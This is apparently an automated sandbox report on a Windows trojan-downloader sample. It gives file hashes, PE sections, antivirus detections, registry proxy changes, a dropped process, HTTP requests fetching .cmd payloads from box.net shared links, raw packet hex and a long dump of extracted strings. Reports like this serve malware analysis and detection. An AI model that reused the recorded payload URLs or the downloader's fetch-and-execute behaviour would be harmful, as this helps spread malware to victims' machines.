Analysis Date2014-03-14 19:33:44
MD502948d1b6de2180e3d48af091a3bdd44
SHA1ac7f044eec7e622efc6026cf3682b1d2aeaf90d5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 2f597e4ca90576ce8ce02c1fd0c625e4 sha1: 0075eb5c875133e3d97727679fbaf9a3576d5c2f size: 90112
SectionDATA md5: 7c09998aa393d3d109491ba9bb0e68b3 sha1: d70bfeacd84eee4ca34a4a60b64567c7e18e7aa9 size: 2048
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: c79f46938718bd8b9fb429ee0bf268cc sha1: 43492c35c4b08d574221ef078434970dc874294c size: 3072
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 076b242ee0e0b1a4ea9b8ff567befb6b sha1: d26e41c4f1b30f098cb43879697ecf4eea8005b3 size: 512
Section.reloc md5: 4e613977daa6aedf3e129ec5ca350057 sha1: e9620f61e8335ae0443d563cb3dff8a8d4cfc889 size: 7680
Section.rsrc md5: 2828ffef6c2968f8096b852b94596b6d sha1: 97f1b5e2243f936b2927ea6c4f047d2aff8734db size: 31232
Timestamp1992-06-19 22:22:17
PEhash29656ce00780e21b0ea201b8bbd12babb50d34dd
IMPhash36c22b46092e3f4497aa2b5d3de68220
AVaviraDIAL/Generic
AVmsseTrojanDownloader:Win32/Small.gen!AO
AVavgDownloader.Rozena

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\WINDOWS\astra.exe
Winsock DNSwww.box.net
Winsock URLhttp://www.box.net/shared/static/xhf7wad6sg.cmd
Winsock URLhttp://www.box.net/shared/static/u195q51kwc.cmd
Winsock URLhttp://www.box.net/shared/static/5bhvnbogks.cmd

Process
↳ C:\WINDOWS\astra.exe

Network Details:

DNSwww.box.net
Type: A
74.112.185.83
DNSwww.box.net
Type: A
74.112.184.83
HTTP GEThttp://www.box.net/shared/static/u195q51kwc.cmd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/5bhvnbogks.cmd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/xhf7wad6sg.cmd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 74.112.185.83:80
Flows TCP192.168.1.1:1033 ➝ 74.112.185.83:80
Flows TCP192.168.1.1:1034 ➝ 74.112.185.83:80

Raw Pcap
0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f75 31393571 35316b77 632e636d   ic/u195q51kwc.cm
0x00000020 (00032)   64204854 54502f31 2e310d0a 41636365   d HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f35 6268766e 626f676b 732e636d   ic/5bhvnbogks.cm
0x00000020 (00032)   64204854 54502f31 2e310d0a 41636365   d HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f78 68663777 61643673 672e636d   ic/xhf7wad6sg.cm
0x00000020 (00032)   64204854 54502f31 2e310d0a 41636365   d HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
\
-
.
../.
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Control-C hit
December
Division by zero
DVCLAL
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property value List capacity out of bounds (%d)
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)
MAINICON(
March
Monday
No argument for format '%s'"Variant method calls not supported
November
October
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Operation not supported
Out of memory
PACKAGEINFO
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
!'%s' is not a valid integer value
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Unable to create directory
Unexpected variant error
)Variant or safe array index out of bounds
Variant or safe array is locked
Variant overflow
Write$Error creating variant or safe array
(((((((((___>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0$0(0,0004080<0@0D0T0t0|0
0*000J0R0Z0f0n0v0~0
0/0@0P0f0r0
"0+010:0B0K0U0Z0e0n0}0
0031F034E81173E92D963D2FD77EC6A35BF52F6FA850E261F062DF1ED16B87BC160FC5B9B3BD78FA618F4B9E8DBF6089
<0@0D0(10141X1\1
0<0H0L0P0T0X0\0`0d0p0}0
0:0S0k0
	0;0w0
0123456789ABCDEF
0:1A1S1q1z1
0!2;2E2
> >$>(>,>0>4>8><>@>D>H>L>P>T>h>
:$:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:|:
:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;H;h;p;t;x;|;
? ?$?(?,?0?4?H?h?p?t?x?|?
<$<(<0<4<<<@<H<L<T<X<`<d<l<p<x<|<
= =$=,=0=8=<=D=H=P=T=\=`=h=l=t=x=
>'>0>;>D>K>Z>a>
;+<0<J<o<
; ;$;(;,;0;L;l;t;x;|;
"0?_Z______ZZZKI??__Z__________ZY___Z____________YYZ__
10181<1@1D1H1L1P1T1X1r1z1
1#1'1+1/13171;1?1C1G1K1O1_1
1'1-141:1?1E1L1V1]1b1h1p1x1
1*1;1D1
1,14181<1@1D1H1L1P1T1d1
1-181=1B1O1e1l1~1
1?1U1m1r1
121\1e1u1}1
1(252^2
1E3827D2669DD856E973F51639A710D70D49FE558DFA339F33
1F1b1f1j1n1r1v1z1~1
2034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
2"2*222:2B2J2R2Z2b2j2r2z2
2)2.23282=2C2H2M2S2Z2`2g2m2t2z2
2(2@2L2T2k2z2
2(262j2
2)282O2^2u2
2;2G2N2X2c2u2
2 3)3[3d3
2,3P3n3~3
282@2D2H2L2P2T2X2\2`2p2
2B2W2l2
2d3h3l3p3t3x3|3
2h3l3p3t3x3|3
2M2h2q2
2P2X2`2h2p2x2
;;;;;;;;;;;;3
314?4N4e4
3(3034383<3@3D3H3L3P3`3
3 3$3(3,303H3h3p3t3x3|3
3#3'3+3/33373;3?3C3G3K3O3S3W3[3_3c3g3k3o3s3
3 3@3H3L3P3T3X3\3`3d3h3x3
3'3B3U3^3}3
34DD0525CA1CA346F064B7BF63F06683BF1075FD15C666FB5CF4
3'5[6B7x7
363l3y3
>#>'>+>/>3>7>
;;3CKN\PWW
3Messages
4$4(4,4044484<4@4D4T4t4|4
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4!4%4)4-4145494=4
4,4L4T4X4\4`4d4h4l4p4t4
4$4u4|4
46D05EEB0F6A8B849FC42BC34C87CE679A3225BB7EA2
4A4P4^4
<4<<<@<D<H<L<P<T<X<\<x<
>4><>@>D>H>L>P>T>X>\>x>
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>S>_>l>~>
:&:,:4:F:R:a:m:u:
"4Lhmws__
4m5q5u5y5}5
;);5;~=
;%;-;5;=;
5$5,5054585<5@5D5H5L5\5|5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5 5$5(5,5D5d5l5p5t5x5|5
5%5/5C5R5
5$5C5K5Y5
5(5K5z5+6G6
5 6'666=6[6
576b6r6}6
5A6^6{6
>*>5>?>J>T>_>i>s>y>
5O5n5v5~5
5?____ZY_[9
6$636=6O6g6s6
6#6(63696>6I6O6T6_6e6j6u6{6
6 6$6(6,6064686<6@6P6p6x6|6
6 6@6H6L6P6T6X6\6`6d6h6x6
6#6+6O6o6
6-797T7
6.7C7P7p7u8
6'7H7o7
#6A?__\_CC
6AF47A8784C40531D67FDD1573EE64D30D4AFC558DAF4E9B39A2A5598EAB46F86896F772AB49E2053ADC036FE45CDC
6D6L6W6
:&:.:6:>:F:N:V:^:f:n:v:~:
:%:+:6:>:G:S:Y:a:j:v:{:
>!>6>;>H>h>
747N7]7
7&707:7Q7b7o7v7z7
7,74787<7@7D7H7L7P7T7h7
7%7+707;7A7F7Q7W7\7g7m7r7}7
7+7=7U7
7>7B7H7L7Q7X7^7f7q7
7)7L7X7\7l7t7x7|7
7_8f8~8
7Project1
7?_____ZZSSH%
8,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
859N9e9
8(828W8a8k8s8y8
 (88(3Nq
8"848B8F8X8q8|8
8$8.868>8F8N8v8
8<8D8H8L8P8T8X8\8`8d8|8
8&9.:2:6:::>:B:F:J:N:R:V:Z:^:b:f:j:n:r:v:z:~:
8&9*9.9F9T9X9t9|9
?$?.?8?B?L?V?h?
/'+8FX]s}
%8@HHHI_~
%8LX]]]XUav
/)+8Ql
9680EF1D38B3313EC12B4DED72DD6591B414075D9F44
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9l9}9
9"9,9C9O9\9n9{9
:9:=:A:E:I:M:Q:U:Y:]:a:e:i:m:q:u:y:}:
9H9W9f9
9p9t9x9|9
A94BEA0E325EBEA652FB402ACA034B2ED50EC7C77198AA29B82A17C77FB87592C3B87097BCA649FD2F26D50D7A924DFC
advapi32.dll
;A<M<\<
Apartment
Array 
B9A58AB743BE3EC9559EC25BFA57FB39D337D96382
;	;B;b;
Boolean
BT]?___='
ByRef 
>.>C>}>
**?___\_C8	 2
CF6180A55AA6E65D9822AA9CB811B9B0568E4644FD27DB7AE979E617C872BE64F16BE10B32FD3BCA779D4588F714CC7C
CharNextA
CharToOemA
Classes
^Classes
CloseHandle
CoAddRefServerProcess
CoCreateInstanceEx
CoInitialize
CoInitializeEx
CompareStringA
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
CoUninitialize
CreateDirectoryA
CreateEventA
CreateFileA
Currency
CVariants
?____D
DDDA3s
DDDDDD
DDDDDDL
DDDDDL
DDDDLDD
Decimal
DeleteCriticalSection
<D=I=h=y=5><>
Dispatch
Double
;$;);`;e;~;
E1f3o3v4
EAbstractError
EAccessViolation
EAssertionFailed
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError
EFileStreamError
EFOpenErrorH4A
EHeapException
EInOutErrorH`@
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidOp
EInvalidPointerxd@
EListError
EMathError
EnterCriticalSection
EnumCalendarInfoA
	EOleError
EOleException
EOleSysError
_E)O____________M3__O?(((((_____G@__(&:FNQF((___J@_(.4-/<LVX?(__P
EOSError
EOutOfMemory
	EOverflow
EPrivilege
ERangeError
EReadError
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError`
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError
EWriteErrorP5A
	Exception8_@
ExitProcess
EZeroDividelc@
FComObj
FileTimeToDosDateTime
FileTimeToLocalFileTime
FindClose
FindFirstFileA
FindWindowA
FormatMessageA
FPUMaskValue
FreeLibrary
='=F=X=
GetACP
GetCommandLineA
GetCPInfo
GetCurrentThreadId
GetDateFormatA
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetErrorInfo
GetFileAttributesA
GetFullPathNameA
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeExA
GetSystemMetrics
GetThreadLocale
GetTickCount
GetVersion
GetVersionExA
;&;.;;;G;T;f;l;t;|;
= =$=(=H=h=p=t=x=|=
hhVJB90$""2n
: :@:H:L:P:T:X:\:`:d:h:
>+>I>c>
.idata
\IHXg}
II&&.\
(II1*-
%II11,O
#II1*3
IIII|5IIIIIIIIIII   
IIIII7II>3Fg~
IIIIIB(II<.Fg
IIIII|GIIIIIIIIIIIIII     +H/
IIIIII
IIIIIIaVl
IIIIIIe[n}
IIIIIII
IIIIIIII
IIIII (III1,@p
IIIIIIIII
IIIIIIIII 
IIIIIIIIII 
IIIIIIIIIII
IIIIIIIIIIII 
IIIIIIIIIIIII
III|IIIIIIIIII  
IIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIBR_~
IIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIII??9?IIII
IIIIIIII=Jg
IIIIIIIWJg
IIIIIIr[
IIIIII|vIIIIIIIIIIIIIIIIIIIII?;)
IIIIII`Vs
IIIIINR]
IIIISx
IInterface
INFNAN
InitializeCriticalSection
Integer
InterlockedDecrement
InterlockedIncrement
IStringsAdapter
>$?=?J?c?r?
|j[TB-
kernel32.dll
KWindows
~KxI[)
LeaveCriticalSection
 %@L]gs}ssicav
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
LongWord
<(<-<L<Q<k<|<
%+@L]s}
lstrcpynA
lstrlenA
M1.@Qg
m/d/yy
MessageBoxA
M?FXg}
mmmm d, yyyy
:mm:ss
mm[TJC-
MultiByteToWideChar
Neutral
<N<z<I=M=Q=U=Y=]=a=e=i=m=q=u=y=}=
?$?<?o?
ole32.dll
oleaut32.dll
OleStr
`PHXg}
PostMessageA
-@PPR`
P.reloc
P.rsrc
qComConst
QQQQQQQQSV
QQQQQQSVW3
QQQQQSVW
QQQQSV
QTypInfo
QueryPerformanceCounter
?q?u?y?}?
R?7@Xg}
RaiseException
.rdata
ReadFile
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
>R?e?q?
ResetEvent
<R=i=|=
"RTLConsts
RtlUnwind
Runtime error     at 00000000
;/;:;[;s;
=.>S>{>
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SdZ]_^[
SetEndOfFile
SetEvent
SetFilePointer
ShortInt
Single
Smallint
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
String
Strings
S$_^[Y]
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
SysUtils
<*t"<0r=<9w9i
tagEXCEPINFO 
TCustomVariantType
	TErrorRec
TExceptRec
TFileStream<;A
THandleStream
This program must be run under Win32
t%HtIHtm
TInterfacedObject
TlsGetValue
TlsSetValue
$TMultiReadExclusiveWriteSynchronizer
TObjecth
TObjectt
TPersistent
	TRegGroup
TRegGroups
TStreamP:A
TStringItem
TStringList
TStringListp9A
TStrings
TThreadList
TThreadLocalCounter
UnhandledExceptionFilter
Unknown
URLDownloadToFileA
UrlMon
URLMON.DLL
user32.dll
UTypes
;UW?__R+
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
$VarUtils
VarXor
VirtualAlloc
VirtualFree
VirtualQuery
;?=V=]=_>l>y>
W:7@Qg}
WaitForSingleObject
WideCharToMultiByte
WideStringh
WinExec
WriteFile
&+@X]s}
YUQL23KL23DF90WI5E1JAS467NMCXXL6JAOAUWWMCL0AOMM4A4VZYW9KHJUI2347EJHJKDF3424SKL K3LAKDJSL9RTIKJ
_^[YY]
YZ]_^[
(Z]_^[
$Z]_^[
|ZIIIIIIIIIIIIIIIIIIIIIIIMUU
ZTUWVSPRTj